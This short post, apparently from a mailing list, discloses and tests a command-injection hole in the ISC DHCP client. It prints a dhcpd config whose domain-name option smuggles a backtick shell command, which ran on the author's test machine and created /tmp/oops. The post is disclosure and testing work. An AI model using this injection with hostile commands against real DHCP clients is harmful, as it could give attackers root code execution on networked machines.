Somebody at OpenBSD discovered a possible root exploit in the ISC DHCP client. I can confirm that as of 6:23am on June 23rd after several hours of hacking around the sources I had the following dhcpd config running on my own machine's private network for testing: shared-network LOCAL-NET { option domain-name "my.`echo hi > /tmp/oops`.domain"; option domain-name-servers 192.168.1.3, 192.168.1.5; subnet 192.168.1.0 netmask 255.255.255.0 { option routers 192.168.1.1; range 192.168.1.32 192.168.1.127; } } ... and when dhclient finished running I had a nice little present in /tmp/ named 'oops' that contained the string 'hi' ..